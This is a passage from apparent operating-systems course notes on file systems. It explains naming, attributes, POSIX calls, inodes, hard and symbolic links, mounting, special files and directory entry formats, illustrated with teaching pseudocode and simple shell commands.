case) for storage. Others retain the original case, but consider it simply a matter of decoration.
For example, if you create a file named ``Foo,'' you could open it as ``foo'' or ``FOO,'' but if you
list the directory, you would still see the file listed as ``Foo''.
Character Set
Different systems put different restrictions on what characters can appear in file names. The
UNIX directory structure supports names containing any character other than NUL (the byte
consisting of all zero bits), but many utility programs (such as the shell) would have troubles
with names that have spaces, control characters or certain punctuation characters (particularly
`/'). MacOS allows all of these (e.g., it is not uncommon to see a file name with the Copyright
symbol © in it). With the world-wide spread of computer technology, it is becoming increasingly
important to support languages other than English, and in fact alphabets other than Latin. There
is a move to support character strings (and in particular file names) in the Unicode character set,
91
which devotes 16 bits to each character rather than 8 and can represent the alphabets of all major
modern languages from Arabic to Devanagari to Telugu to Khmer.
Format
It is common to divide a file name into a base name and an extension that indicates the type of
the file. DOS requires that each name be compose of a bast name of eight or less characters and
an extension of three or less characters. When the name is displayed, it is represented as
base.extension. UNIX internally makes no such distinction, but it is a common convention to
include exactly one period in a file name (e.g. foo.c for a C source file).
7.2 File System Structure
UNIX hides the ``chunkiness'' of tracks, sectors, etc. and presents each file as a ``smooth'' array
of bytes with no internal structure. Application programs can, if they wish, use the bytes in the
file to represent structures. For example, a wide-spread convention in UNIX is to use the newline
character (the character with bit pattern 00001010) to break text files into lines. Some other
systems provide a variety of other types of files. The most common are files that consist of an
array of fixed or variable size records and files that form an index mapping keys to values.
Indexed files are usually implemented as B-trees.
File Types
Most systems divide files into various ``types.'' The concept of ``type'' is a confusing one,
partially because the term ``type'' can mean different things in different contexts. UNIX initially
supported only four types of files: directories, two kinds of special files (discussed later), and
``regular'' files. Just about any type of file is considered a ``regular'' file by UNIX. Within this
category, however, it is useful to distinguish text files from binary files; within binary files there
are executable files (which contain machine-language code) and data files; text files might be
source files in a particular programming language (e.g. C or Java) or they may be humanreadable text in some mark-up language such as html (hypertext markup language). Data files
may be classified according to the program that created them or is able to interpret them, e.g., a
file may be a Microsoft Word document or Excel spreadsheet or the output of TeX. The
possibilities are endless.
In general (not just in UNIX) there are three ways of indicating the type of a file:
92
1. The operating system may record the type of a file in meta-data stored separately from
the file, but associated with it. UNIX only provides enough meta-data to distinguish a
regular file from a directory (or special file), but other systems support more types.
2. The type of a file may be indicated by part of its contents, such as a header made up of
the first few bytes of the file. In UNIX, files that store executable programs start with a
two byte magic number that identifies them as executable and selects one of a variety of
executable formats. In the original UNIX executable format, called the a.out format, the
magic number is the octal number 0407, which happens to be the machine code for a
branch instruction on the PDP-11 computer, one of the first computers to implement
UNIX. The operating system could run a file by loading it into memory and jumping to
the beginning of it. The 0407 code, interpreted as an instruction, jumps to the word
following the 16-byte header, which is the beginning of the executable code in this
format. The PDP-11 computer is extinct by now, but it lives on through the 0407 code!
3. The type of a file may be indicated by its name. Sometimes this is just a convention, and
sometimes it's enforced by the OS or by certain programs. For example, the UNIX Java
compiler refuses to believe that a file contains Java source unless its name ends with
.java.
Some systems enforce the types of files more vigorously than others. File types may be enforced

Not at all,

Only by convention,

By certain programs (e.g. the Java compiler), or

By the operating system itself.
UNIX tends to be very lax in enforcing types.
7.3 Access Methods and Protection
Many systems support various access modes for operations on a file such as sequential, random
and indexed.

Sequential. Read or write the next record or next n bytes of the file. Usually, sequential
access also allows a rewind operation.
93

Random. Read or write the nth record or bytes i through j. UNIX provides an equivalent
facility by adding a seek operation to the sequential operations listed above. This
packaging of operations allows random access but encourages sequential access.

Indexed. Read or write the record with a given key. In some cases, the ``key'' need not be
unique--there can be more than one record with the same key. In this case, programs use
a combination of indexed and sequential operations: Get the first record with a given key,
then get other records with the same key by doing sequential reads.
Note that access modes are distinct from file structure--e.g., a record-structured file can be
accessed either sequentially or randomly--but the two concepts are not entirely unrelated. For
example, indexed access mode only makes sense for indexed files.
File Attributes. This is the area where there is the most variation among file systems. Attributes
can also be grouped by general category.
Ownership and Protection. Owner, owner's ``group,'' creator, access-control list (information
about who can to what to this file, for example, perhaps the owner can read or modify it, other
members of his group can only read it, and others have no access).
Time stamps. Time created, time last modified, time last accessed, time the attributes were last
changed, etc. UNIX maintains the last three of these. Some systems record not only when the file
was last modified, but by whom.
Sizes. Current size, size limit, ``high-water mark'', space consumed (which may be larger than
size because of internal fragmentation or smaller because of various compression techniques).
Type Information. As described above: File is ASCII, is executable, is a ``system'' file, is an
Excel spread sheet, etc.
Misc. Some systems have attributes describing how the file should be displayed when a directly
is listed. For example MacOS records an icon to represent the file and the screen coordinates
where it was last displayed. DOS has a ``hidden'' attribute meaning that the file is not normally
shown. UNIX achieves a similar effect by convention: The ls program that is usually used to list
files does not show files with names that start with a period unless you explicit request it to (with
the -a option).
UNIX records a fixed set of attributes in the meta-data associated with a file. If you want to
record some fact about the file that is not included among the supported attributes, you have to
94
use one of the tricks listed above for recording type information: encode it in the name of the
file, put it into the body of the file itself, or store it in a file with a related name (e.g.
``foo.attributes''). Other systems (notably MacOS and Windows NT) allow new attributes to be
invented on the fly. In MacOS, each file has a resource fork, which is a list of (attribute-name,
attribute-value) pairs. The attribute name can be any four-character string, and the attribute value
can be anything at all. Indeed, some kinds of files put the entire ``contents'' of the file in an
attribute and leave the ``body'' of the file (called the data fork) empty.
Operations
POSIX, a standard API (application programming interface) based on UNIX, provides the
following operations (among others) for manipulating files:
fd = open(name, operation)
fd = creat(name, mode)
status = close(fd)
byte_count = read(fd, buffer, byte_count)
byte_count = write(fd, buffer, byte_count)
offset = lseek(fd, offset, whence)
status = link(oldname, newname)
status = unlink(name)
status = stat(name, buffer)
status = fstat(fd, buffer)
status = utimes(name, times)
status = chown(name, owner, group) or fchown(fd, owner, group)
status = chmod(name, mode) or fchmod(fd, mode)
status = truncate(name, size) or ftruncate(fd, size)
Status. Many functions return a ``status'' which is either 0 for success or -1 for errors (there is
another mechanism to get more information about went wrong). Other functions also use -1 as a
return value to indicate an error.
Name. A character-string name for a file.
Fd. A ``file descriptor'', which is a small non-negative integer used as a short, temporary name
for a file during the lifetime of a process.
Buffer. The memory address of the start of a buffer for supplying or receiving data.
Whence. One of three codes, signifying from start, from end, or from current location.
Mode. A bit-mask specifying protection information.
Operation. An integer code, one of read, write, read and write, and perhaps a few other
possibilities such as append only.
95
The open call finds a file and assigns a decriptor to it. It also indicates how the file will be used
by this process (read only, read/write, etc). The creat call is similar, but creates a new (empty)
file. The mode argument specifies protection attributes (such as ``writable by owner but readonly by others'') for the new file. (Most modern versions of UNIX have merged creat into open
by adding an optional mode argument and allowing the operation argument to specify that the
file is automatically created if it doesn't already exist.) The close call simply announces that fd is
no longer in use and can be reused for another open or creat.
The read and write operations transfer data between a file and memory. The starting location in
memory is indicated by the buffer parameter; the starting location in the file (called the seek
pointer is wherever the last read or write left off. The result is the number of bytes transferred.
For write it is normally the same as the byte_count parameter unless there is an error. For read it
may be smaller if the seek pointer starts out near the end of the file. The lseek operation adjusts
the seek pointer (it is also automatically updated by read and write). The specified offset is added
to zero, the current seek pointer, or the current size of the file, depending on the value of whence.
The function link adds a new name (alias) to a file, while unlink removes a name. There is no
function to delete a file; the system automatically deletes it when there are no remaining names
for it.
The stat function retrieves meta-data about the file and puts it into a buffer (in a fixed,
documented format), while the remaining functions can be used to update the meta-data: utimes
updates time stamps, chown updates ownership, chmod updates protection information, and
truncate changes the size (files can be make bigger by write, but only truncate can make them
smaller). Most come in two flavors: one that take a file name and one that takes a descriptor for
an open file.
To learn more details about any of these functions, type something like
man 2 lseek
to any UNIX system. The `2' means to look in section 2 of the manual, where system calls are
explained.
Other systems have similar operations, and perhaps a few more. For example, indexed or
indexed sequential files would require a version of seek to specify a key rather than an offset. It
is also common to have a separate append operation for writing to the end of a file.
96
The User Interface to Directories
We already talked about file names. One important feature that a file name should have is that it
be unambiguous: There should be at most one file with any given name. The symmetrical
condition, that there be at most one name for any given file, is not necessarily a good thing.
Sometimes it is handy to be able to give multiple names to a file. When we consider
implementation, we will describe two different ways to implement multiple names for a file,
each with slightly different semantics. If there are a lot of files in a system, it may be difficult to
avoid giving two files the same name, particularly if there are multiple uses independently
making up names. One technique to assure uniqueness is to prefix each file name with the name
(or user id) of the owner. In some early operating systems, that was the only assistance the
system gave in preventing conflicts.
A better idea is the hierarchical directory structure, first introduced by Multics, then popularized
by UNIX, and now found in virtually every operating system. You probably already know about
hierarchical directories, but we would like to describe them from an unusual point of view, and
then explain how this point of view is equivalent to the more familiar version.
Each file is named by a sequence of names. Although all modern operating systems use this
technique, each uses a different character to separate the components of the sequence when
displaying it as a character string. Multics uses `>', UNIX uses `/', DOS and its descendants use
`\', and MacOS uses ':'. Sequences make it easy to avoid naming conflicts. First, assign a
sequence to each user and only let him create files with names that start with that sequence. For
example, we might be assigned the sequence (``usr'', ``solomon''), written in UNIX as
/usr/solomon. So far, this is the same as just appending the user name to each file name. But it
allows me to further classify my own files to prevent conflicts. When we start a new project, we
can create a new sequence by appending the name of the project to the end of the sequence
assigned to me, and then use this prefix for all files in the project. For example, we might choose
/usr/solomon/cs537 for files associated with this course, and name them /usr/solomon/cs537/foo,
/usr/solomon/cs537/bar, etc. As an extra aid, the system allows me to specify a ``default prefix''
and a short-hand for writing names that start with that prefix. In UNIX, we use the system call
chdir to specify a prefix, and whenever we use a name that does not start with `/', the system
automatically adds that prefix.
97
It is customary to think of the directory system as a directed graph, with names on the edges.
Each path in the graph is associated with a sequence of names, the names on the edges that make
up the path. For that reason, the sequence of names is usually called a path name. One node is
designated as the root node, and the rule is enforced that there cannot be two edges with the
same name coming out of one node. With this rule, we can use path name to name nodes. Start at
the root node and treat the path name as a sequence of directions, telling us which edge to follow
at each step. It may be impossible to follow the directions (because they tell us to use an edge
that does not exist), but if is possible to follow the directions, they will lead us unambiguously to
one node. Thus path names can be used as unambiguous names for nodes. In fact, as we will see,
this is how the directory system is actually implemented. However, we think it is useful to think
of ``path names'' simply as long names to avoid naming conflicts, since it clear separates the
interface from the implementation.
7.4 Implementing File Systems
Files
We will assume that all the blocks of the disk are given block numbers starting at zero and
running through consecutive integers up to some maximum. We will further assume that blocks
with numbers that are near each other are located physically near each other on the disk (e.g.,
same cylinder) so that the arithmetic difference between the numbers of two blocks gives a good
estimate how long it takes to get from one to the other. First let's consider how to represent an
individual file. There are (at least!) four possibilities:
Contiguous. The blocks of a file are the block numbered n, n+1, n+2, ..., m. We can represent
any file with a pair of numbers: the block number of of first block and the length of the file (in
blocks). The advantages of this approach are it is simple and the blocks of the file are all
physically near each other on the disk and in order so that a sequential scan through the file will
be fast.
The problem with this organization is that you can only grow a file if the block following the last
block in the file happens to be free. Otherwise, you would have to find a long enough run of free
blocks to accommodate the new length of the file and copy it. As a practical matter, operating
systems that use this organization require the maximum size of the file to be declared when it is
created and pre-allocate space for the whole file. Even then, storage allocation has all the
98
problems we considered when studying main-memory allocation including external
fragmentation.
Linked List. A file is represented by the block number of its first block, and each block contains
the block number of the next block of the file. This representation avoids the problems of the
contiguous representation: We can grow a file by linking any disk block onto the end of the list,
and there is no external fragmentation. However, it introduces a new problem: Random access is
effectively impossible. To find the 100th block of a file, we have to read the first 99 blocks just
to follow the list. We also lose the advantage of very fast sequential access to the file since its
blocks may be scattered all over the disk. However, if we are careful when choosing blocks to
add to a file, we can retain pretty good sequential access performance.
Both the space overhead (the percentage of the space taken up by pointers) and the time
overhead (the percentage of the time seeking from one place to another) can be decreased by
using larger blocks. The hardware designer fixes the block size (which is usually quite small) but
the software can get around this problem by using ``virtual'' blocks, sometimes called clusters.
The OS simply treats each group of (say) four continguous phyical disk sectors as one cluster.
Large, clusters, particularly if they can be variable size, are sometimes called extents. Extents can
be thought of as a compromise between linked and contiguous allocation.
Disk Index. The idea here is to keep the linked-list representation, but take the link fields out of
the blocks and gather them together all in one place. This approach is used in the ``FAT'' file
system of DOS, OS/2 and older versions of Windows. At some fixed place on disk, allocate an
array “I” with one element for each block on the disk, and move the link field from block n to
I[m]. The whole array of links, called a file access table (FAT) is now small enough that it can
be read into main memory when the systems starts up. Accessing the 100th block of a file still
requires walking through 99 links of a linked list, but now the entire list is in memory, so time to
traverse it is negligible (recall that a single disk access takes as long as 10's or even 100's of
thousands of instructions). This representation has the added advantage of getting the ``operating
system'' stuff (the links) out of the pages of ``user data''. The pages of user data are now full-size
disk blocks, and lots of algorithms work better with chunks that are a power of two bytes long.
Also, it means that the OS can prevent users (who are notorious for screwing things up) from
getting their grubby hands on the system data.
99
The main problem with this approach is that the index array we can get quite large with modern
disks. For example, consider a 2 GB disk with 2K blocks. There are million blocks, so a block
number must be at least 20 bits. Rounded up to an even number of bytes, that's 3 bytes--4 bytes if
we round up to a word boundary--so the array I is three or four megabytes. While that's not an
excessive amount of memory given today's RAM prices, if we can get along with less, there are
better uses for the memory.
File Index. Although a typical disk may contain tens of thousands of files, only a few of them are
open at any one time, and it is only necessary to keep index information about open files in
memory to get good performance. Unfortunately the whole-disk index described in the previous
paragraph mixes index information about all files for the whole disk together, making it difficult
to cache only information about open files. The inode structure introduced by UNIX groups
together index information about each file individually. The basic idea is to represent each file as
a tree of blocks, with the data blocks as leaves. Each internal block (called an indirect block in
UNIX jargon) is an array of block numbers, listing its children in order. If a disk block is 2K
bytes and a block number is four bytes, 512 block numbers fit in a block, so a one-level tree (a
single root node pointing directly to the leaves) can accommodate files up to 512 blocks, or one
megabyte in size. If the root node is cached in memory, the ``address'' (block number) of any
block of the file can be found without any disk accesses. A two-level tree, with 513 total indirect
blocks, can handle files 512 times as large (up to one-half gigabyte).
The only problem with this idea is that it wastes space for small files. Any file with more than
one block needs at least one indirect block to store its block numbers. A 4K file would require
three 2K blocks, wasting up to one third of its space. Since many files are quite small, this is
serious problem. The UNIX solution is to use a different kind of ``block'' for the root of the tree.
An index node (or inode for short) contains almost all the meta-data about a file listed above:
ownership, permissions, time stamps, etc. (but not the file name). Inodes are small enough that
several of them can be packed into one disk block. In addition to the meta-data, an inode
contains the block numbers of the first few blocks of the file. What if the file is too big to fit all
its block numbers into the inode? The earliest version of UNIX had a bit in the meta-data to
indicate whether the file was ``small'' or ``big.'' For a big file, the inode contained the block
numbers of indirect blocks rather than data blocks. More recent versions of UNIX contain
pointers to indirect blocks in addition to the pointers to the first few data blocks. The inode
contains pointers to (i.e., block numbers of) the first few blocks of the file, a pointer to an
100
indirect block containing pointers to the next several blocks of the file, a pointer to a doubly
indirect block, which is the root of a two-level tree whose leaves are the next blocks of the file,
and a pointer to a triply indirect block. A large file is thus a lop-sided tree.
A real-life example is given by the Solaris 2.5 version of UNIX. Block numbers are four bytes
and the size of a block is a parameter stored in the file system itself, typically 8K (8192 bytes),
so 2048 pointers fit in one block. An inode has direct pointers to the first 12 blocks of the file, as
well as pointers to singly, doubly, and triply indirect blocks. A file of up to 12+2048+2048*2048
= 4,196,364 blocks or 34,376,613,888 bytes (about 32 GB) can be represented without using
triply indirect blocks, and with the triply indirect block, the maximum file size is
(12+2048+2048*2048+2048*2048* 2048)*8192 = 70,403,120,791,552 bytes (slightly more than
246 bytes, or about 64 terabytes). Of course, for such huge files, the size of the file cannot be
represented as a 32-bit integer. Modern versions of UNIX store the file length as a 64-bit integer,
called a ``long'' integer in Java. An inode is 128 bytes long, allowing room for the 15 block
pointers plus lots of meta-data. 64 inodes fit in one disk block. Since the inode for a file is kept in
memory while the file is open, locating an arbitrary block of any file requires reading at most
three I/O operations, not counting the operation to read or write the data block itself.
Directories
A directory is simply a table mapping character-string with human-readable names to
information about files. The early PC operating system CP/M shows how simple a directory can
be. Each entry contains the name of one file, its owner, size (in blocks) and the block numbers of
16 blocks of the file. To represent files with more than 16 blocks, CP/M used multiple directory
entries with the same name and different values in a field called the extent number. CP/M had
only one directory for the entire system.
DOS uses a similar directory entry format, but stores only the first block number of the file in the
directory entry. The entire file is represented as a linked list of blocks using the disk index
scheme described above. All but the earliest version of DOS provide hierarchical directories
using a scheme similar to the one used in UNIX.
UNIX has an even simpler directory format. A directory entry contains only two fields: a
character-string name (up to 14 characters) and a two-byte integer called an inumber, which is
interpreted as an index into an array of inodes in a fixed, known location on disk. All the
remaining information about the file (size, ownership, time stamps, permissions, and an index to
101
the blocks of the file) are stored in the inode rather than the directory entry. A directory is
represented like any other file (there's a bit in the inode to indicate that the file is a directory).
Thus the inumber in a directory entry may designate a ``regular'' file or another directory,
allowing arbitrary graphs of nodes. However, UNIX carefully limits the set of operating system
calls to ensure that the set of directories is always a tree. The root of the tree is the file with
inumber 1 (some versions of UNIX use other conventions for designating the root directory).
The entries in each directory point to its children in the tree. For convenience, each directory also
two special entries: an entry with name ``..'', which points to the parent of the directory in the tree
and an entry with name ``.'', which points to the directory itself. Inumber 0 is not used, so an
entry is marked ``unused'' by setting its inumber field to 0. The algorithm to convert from a path
name to an inumber might be written in Java as follows.
int namei(int current, String[] path) {
for (int i = 0; i<path.length; i++) {
if (inode[current].type != DIRECTORY)
throw new Exception("not a directory");
current = nameToInumber(inode[current], path[i]);
if (current == 0)
throw new Exception("no such file or directory");
}
return current;
}
The procedure nameToInumber(Inode node, String name) (not shown) reads through the
directory file represented by the inode node, looks for an entry matching the given name and
returns the inumber contained in that entry. The procedure namei walks the directory tree,
starting at a given inode and following a path described by a sequence of strings. There is a
procedure with this name in the UNIX kernel. Files are always specified in UNIX system calls
by a character-string path name. You can learn the inumber of a file if you like, but you can't use
the inumber when talking to the UNIX kernel. Each system call that has a path name as an
argument uses namei to translate it to an inumber. If the argument is an absolute path name (it
starts with `/'), namei is called with current == 1. Otherwise, current is the current working
directory.
Since all the information about a file except its name is stored in the inode, there can be more
than one directory entry designating the same file. This allows multiple aliases (called links) for a
file. UNIX provides a system call link (old-name, new-name) to create new names for existing
files. The call link ("/a/b/c", "/d/e/f") works something like this:
102
if (namei(1, parse("/d/e/f")) != 0)
throw new Exception("file already exists");
int dir = namei(1, parse("/d/e")):
if (dir==0 || inode[dir].type != DIRECTORY)
throw new Exception("not a directory");
int target = namei(1, parse("/a/b/c"));
if (target==0)
throw new Exception("no such directory");
if (inode[target].type == DIRECTORY)
throw new Exception("cannot link to a directory");
addDirectoryEntry(inode[dir], target, "f");
The procedure parse (not shown here) is assumed to break up a path name into its components.
If, for example, /a/b/c resolves to inumber 123, the entry (123, "f") is added to directory file
designated by "/d/e". The result is that both "/a/b/c" and "/d/e/f" resolve to the same file (the one
with inumber 123).
We have seen that a file can have more than one name. What happens if it has no names (does
not appear in any directory)? Since the only way to name a file in a system call is by a path
name, such a file would be useless. It would consume resources (the inode and probably some
data and indirect blocks) but there would be no way to read it, write to it, or even delete it. UNIX
protects against this ``garbage collection'' problem by using reference counts. Each inode
contains a count of the number of directory entries that point to it. ``User'' programs are not
allowed to update directories directly. System calls that add or remove directory entries (creat,
link, mkdir, rmdir, etc) update these reference counts appropriately. There is no system call to
delete a file, only the system call unlink(name) which removes the directory entry corresponding
to name. If the reference count of an inode drops to zero, the system automatically deletes the
files and returns all of its blocks to the free list.
We saw before that the reference counting algorithm for garbage collection has a fatal flaw: If
there are cycles, reference counting will fail to collect some garbage. UNIX avoids this problem
by making sure cycles cannot happen. The system calls are designed so that the set of directories
will always be a single tree rooted at inode 1: mkdir creates a new empty (except for the . and ..
entries) as a leaf of the tree, rmdir is only allowed to delete a directory that is empty (except for
the . and .. entries), and link is not allowed to link to a directory. Because links to directories are
not allowed, the only place the file system is not a tree is at the leaves (regular files) and that
cannot introduce cycles.
103
Although this algorithm provides the ability to create aliases for files in a simple and secure
manner, it has several flaws:

It's hard to figure own how to charge users for disk space. Ownership is associated with
the file not the directory entry (the owner's id is stored in the inode). A file cannot be
deleted without finding all the links to it and deleting them. If we create a file and you
make a link to it, we will continue to be charged for it even if we try to remove it through
my original name for it. Worse still, your link may be in a directory we don't have access
to, so we may be unable to delete the file, even though we being charged for its space.
Indeed, you could make it much bigger after we have no access to it.

There is no way to make an alias for a directory.

As we will see later, links cannot cross boundaries of physical disks.

Since all aliases are equal, there's no one ``true name'' for a file. You can find out whether
two path names designate the same file by comparing inumbers. There is a system call to
get the meta-data about a file, and the inumber is included in that information. But there
is no way of going in the other direction: to get a path name for a file given its inumber,
or to find a path name of an open file. Even if you remember the path name used to get to
the file, that is not a reliable ``handle'' to the file (for example to link two files together by
storing the name of one in the other). One of the components of the path name could be
removed, thus invalidating the name even though the file still exists under a different
name.
While it's not possible to find the name (or any name) of an arbitrary file, it is possible to figure
out the name of a directory. Directories do have unique names because the directories form a
tree, and one of the properties of a tree is that there is a unique path from the root to any node.
The ``..'' and ``.'' entries in each directory make this possible. Here, for example, is code to find
the name of the current working directory.
class DirectoryEntry {
int inumber;
String name;
}
String cwd() {
FileInputStream thisDir = new FileInputStream(".");
int thisInumber = nameToInumber(thisDir, ".");
getPath(".", thisInumber);
}
String getPath(String currentName, int currentInumber) {
104
String parentName = currentName + "/..";
FileInputSream parent = new FileInputStream(parentName);
int parentInumber = nameToInumber(parent, ".");
String fname = inumberToName(parent, currentInumber);
if (parentInumber == 1)
return "/" + fname;
else
return getPath(parentInumber, parentName) + "/" + fname;
}
The procedure nameToInumber is similar to the procedure with the same name described above,
but takes an InputStream as an argument rather than an inode. Many versions of UNIX allow a
program to open a directory for reading and read its contents just like any other file. In such
systems, it would be easy to write nameToInumber as a user-level procedure if you know the
format of a directory. The procedure inumberToName is similar, but searches for an entry
containing a particular inumber and returns the name field of the entry.
Symbolic Links
To get around the limitations with the original UNIX notion of links, more recent versions of
UNIX introduced the notion of a symbolic link (to avoid confusion, the original kind of link,
described in the previous section, is sometimes called a hard link). A symbolic link is a new type
of file, distinguished by a code in the inode from directories, regular files, etc. When the namei
procedure that translates path names to inumbers encounters a symlink, it treats the contents of
the file as a pathname and uses it to continue the translation. If the contents of the file is a
relative path name (it does not start with a slash), it is interpreted relative to the directory
containing the link itself, not the current working directory of the process doing the lookup.
int namei(int current, String[] path) {
for (int i = 0; i<path.length; i++) {
if (inode[current].type != DIRECTORY)
throw new Exception("not a directory");
current = nameToInumber(inode[current], path[i]);
if (current == 0)
throw new Exception("no such file or directory");
while (inode[current].type == SYMLINK) {
String link = getContents(inode[current]);
String[] linkPath = parse(link);
if (link.charAt(0) == '/')
current = namei(1, linkPath);
else
current = namei(current, linkPath);
if (current == 0)
throw new Exception("no such file or directory");
}
}
return current;
}
105
The only change from the previous version of this procedure is the addition of the while loop.
Any time the procedure encounters a node of type SYMLINK, it recursively calls itself to
translate the contents of the file, interpreted as a path name, into an inumber.
7.5 Implementation
Although the implementation looks complicated, it does just what you would expect in normal
situations. For example, suppose there is an existing file named /a/b/c and an existing directory
/d. Then the command ln -s /a/b /d/e makes the path name /d/e a synonym for /a/b, and also
makes /d/e/c a synonym for /a/b/c. From the user's point of view, the the picture looks like this:
In implementation terms, the picture looks like the picture below. The hexagon denotes a node of
type symlink.
Here's a more elaborate example that illustrates symlinks with relative path names. Suppose we
have an existing directory /usr/solomon/cs537/s90 with various sub-directories and we are
setting up project 5 for this semester. We might do something like the following commands and
the logical and physical links are shown in the picture below. All three of the cat commands refer
to the same file.
cd /usr/solomon/cs537
mkdir f96
106
cd f96
ln -s ../s90/proj5 proj5.old
cat proj5.old/foo.c
cd /usr/solomon/cs537
cat f96/proj5.old/foo.c
cat s90/proj5/foo.c
Logical link of the above command
Physical link of the above command
The added flexibility of symlinks over hard links comes at the expense of less security. Symlinks
are neither required nor guaranteed to point to valid files. You can remove a file out from under a
symlink, and in fact, you can create a symlink to a non-existent file. Symlinks can also have
cycles. For example, this works fine:
cd /usr/solomon
mkdir bar
ln -s /usr/solomon foo
ls /usr/solomon/foo/foo/foo/foo/bar
107
However, in some cases, symlinks can cause infinite loops or infinite recursion in the namei
procedure. The real version in UNIX puts a limit on how many times it will iterate and returns an
error code of ``too many links'' if the limit is exceeded. Symlinks to directories can also cause the
``change directory'' command cd to behave in strange ways. Most people expect that the two
commands
cd foo
cd .. to cancel each other out. But in the last example, the commands
cd /usr/solomon
cd foo
cd ..
would leave you in the directory /usr. Some shell programs treat cd specially and remember what
alias you used to get to the current directory. After cd /usr/solomon; cd foo; cd foo, the current
directory is /usr/solomon/foo/foo, which is an alias for /usr/solomon, but the command cd .. is
treated as if you had typed cd /usr/solomon/foo.
Mounting
What if your computer has more than one disk? In many operating systems (including DOS and
its descendants) a pathname starts with a device name, as in C:\usr\solomon (by convention, C is
the name of the default hard disk). If you leave the device prefix off a path name, the system
supplies a default current device similar to the current directory. UNIX allows you to glue
together the directory trees of multiple disks to create a single unified tree. There is a system call
mount(device, mount_point)
where device names a particular disk drive and mount_point is the path name of an existing node
in the current directory tree (normally an empty directory). The result is similar to a hard link:
The mount point becomes an alias for the root directory of the indicated disk. Here's how it
works: The kernel maintains a table of existing mounts represented as (device1, inumber,
device2) triples. During namei, whenever the current (device, inumber) pair matches the first two
fields in one of the entries, the current device and inumber become device2 and 1, respectively.
Here's the expanded code:
int namei(int curi, int curdev, String[] path) {
for (int i = 0; i<path.length; i++) {
if (disk[curdev].inode[curi].type != DIRECTORY)
throw new Exception("not a directory");
curi = nameToInumber(disk[curdev].inode[curi], path[i]);
if (curi == 0)
throw new Exception("no such file or directory");
108
while (disk[curdev].inode[curi].type == SYMLINK) {
String link = getContents(disk[curdev].inode[curi]);
String[] linkPath = parse(link);
if (link.charAt(0) == '/')
current = namei(1, linkPath);
else
current = namei(current, linkPath);
if (current == 0)
throw new Exception("no such file or directory");
}
int newdev = mountLookup(curdev, curi);
if (newdev != -1) {
curdev = newdev;
curi = 1;
}
}
return current;
}
In this code, we assume that mountLookup searches the mount table for matching entry,
returning -1 if no matching entry is found. There is a also a special case (not shown here) for ``..''
so that the ``..'' entry in the root directory of a mounted disk behaves like a pointer to the parent
directory of the mount point.
The Network File System (NFS) from Sun Microsystems extends this idea to allow you to mount
a disk from a remote computer. The device argument to the mount system call names the remote
computer as well as the disk drive and both pieces of information are put into the mount table.
Now there are three pieces of information to define the ``current directory'': the inumber, the
device, and the computer. If the current computer is remote, all operations (read, write, create,
delete, mkdir, rmdir, etc.) are sent as messages to the remote computer. Information about
remote open files, including a seek pointer and the identity of the remote machine, is kept
locally. Each read or write operation is converted locally to one or more requests to read or write
blocks of the remote file. NFS caches blocks of remote files locally to improve performance.
Special Files
We said that the UNIX mount system call has the name of a disk device as an argument. How do
you name a device? The answer is that devices appear in the directory tree as special files. An
inode whose type is ``special'' (as opposed to ``directory,'' ``symlink,'' or ``regular'') represents
some sort of I/O device. It is customary to put special files in the directory /dev, but since it is the
inode that is marked ``special,'' they can be anywhere. Instead of containing pointers to disk
blocks, the inode of a special file contains information (in a machine-dependent format) about
109
the device. The operating system tries to make the device look as much like a file as possible, so
that ordinary programs can open, close, read, or write the device just like a file.
Some devices look more like real file than others. A disk device looks exactly like a file. Reads
return whatever is on the disk and writes can scribble anywhere on the disk. For obvious security
reasons, the permissions for the raw disk devices are highly restrictive. A tape drive looks sort of
like a disk, but a read will return only the next physical block of data on the device, even if more
is requested.
The special file /dev/tty represent the terminal. Writes to /dev/tty display characters on the
screen. Reads from /dev/tty return characters typed on the keyboard. The seek operation on a
device like /dev/tty updates the seek pointer, but the seek pointer has no effect on reads or writes.
Reads of /dev/tty are also different from reads of a file in that they may return fewer bytes than
requested: Normally, a read will return characters only up through the next end-of-line. If the
number of bytes requested is less than the length of the line, the next read will get the remaining
bytes. A read call will block the caller until at least one character can be returned. On machines
with more than one terminal, there are multiple terminal devices with names like /dev/tty0,
/dev/tty1, etc.
Some devices, such as a mouse, are read-only. Write operations on such devices have no effect.
Other devices, such as printers, are write-only. Attempts to read from them give an end-of-file
indication (a return value of zero). There is special file called /dev/null that does nothing at all:
reads return end-of-file and writes send their data to the garbage bin. (New EPA rules require
that this data be recycled. It is now used to generate federal regulations and other meaningless
documents.) One particularly interesting device is /dev/mem, which is an image of the memory
space of the current process. In a sense, this device is the exact opposite of memory-mapped
files. Instead of making a file look like part of virtual memory, it makes virtual memory look like
a device.
This idea of making all sorts of things look like files can be very powerful. Some versions of
UNIX make network connections look like files. Some versions have a directory with one
special file for each active process. You can read these files to get information about the states of
processes. If you delete one of these files, the corresponding process is killed. Another idea is to
have a directory with one special file for each print job waiting to be printed. Although this idea
was pioneered by UNIX, it is starting to show up more and more in other operating systems.
110
Long File Names
The UNIX implementation described previously allows arbitrarily long path names for a files,
but each component is limited in length. In the original UNIX implementation, each directory
entry is 16 bytes long: two bytes for the inumber and 14 bytes for a path name component.
class Dirent {
public short inumber;
public byte name[14];
}
If the name is less than 14 characters long, trailing bytes are filled with nulls (bytes with all bits
set to zero--not to be confused with `0' characters). An inumber of zero is used to mark an entry
as unused (inumbers for files start at 1).

To look up a name, search the whole directory, starting at the beginning.

To ``remove'' an entry, set its inumber flag to zero.

To add an entry, search for an entry with a zero inumber field and re-use it. If there aren't
any, add an entry to the end (making the file 16 bytes bigger).
This representation has one advantage.

It is very simple. In particular, space allocation is easy because all entries are the same
length.
However, it has several disadvantages.

Since an inumber is only 16 bits, there can be at most 65,535 files on any one disk.

A file name can be at most 14 characters long.

Directories grow, but they never shrink.

Searching a very large directory can be slow.
The people at Berkeley, while they were rewriting the file system code to make it faster, also
changed the format of directories to get rid of the first two problems (they left the remaining
problems unfixed). This new organization has been adopted by many (but not all) versions of
UNIX introduced since then.
The new format of a directory entry looks like this:
class DirentLong {
int inumber;
short reclen;
111
short namelen;
byte name[];
}
The inumber field is now a 4-byte (32-bit) integer, so that a disk can have up to 4,294,967,296
files. The reclen field indicates the entire length of the DirentLong entry, including the 8-byte
header. The actual length of the name array is thus reclen - 8 bytes. The namelen field indicates
the length of the name. The remaining space in the name array is unused. This extra padding at
the end of the entry serves three purposes.

It allows the length of the entry to be padded up to a multiple of 4 bytes so that the
integer fields are properly aligned (some computer architectures require integers to be
stored at addresses that are multiples of 4).

The last entry in a disk block can be padded to make it extend to the end of the block.
